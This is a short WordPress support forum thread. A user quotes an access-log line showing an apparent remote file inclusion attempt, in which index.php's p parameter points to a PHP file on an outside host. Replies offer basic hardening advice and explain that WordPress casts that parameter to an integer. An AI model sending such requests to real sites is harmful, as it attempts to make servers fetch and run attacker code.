index.php injection (3 posts)

  1. anibol
    Posted 9 years ago #

    Hi my wordpress installation it's been hacked using php injection I think. I've discover this on the log:

    /index.php?p=http://c0d1f1c4d0r.by.ru/list.txt?? HTTP/1.1" 200 73443 "-" "libwww-perl/5.805"

    and list.txt is a file with php

    Any help?
    P.D. I've versiĆ³n 2.0.5 just updated

  2. moshu
    Posted 9 years ago #

    1. Check with your host - it may be that the server has been hacked through some other site!
    2. Check the file permissions on all your files and folders.
    3. Change your passwords.

  3. I don't see how this request could actually inject anything.

    The p query arg is the post id

    in WP::parse_query it is cast to int:

    wp-inclues/classes.php:93 $qv['p'] = (int) $qv['p'];

Topic Closed

This topic has been closed to new replies.

About this Topic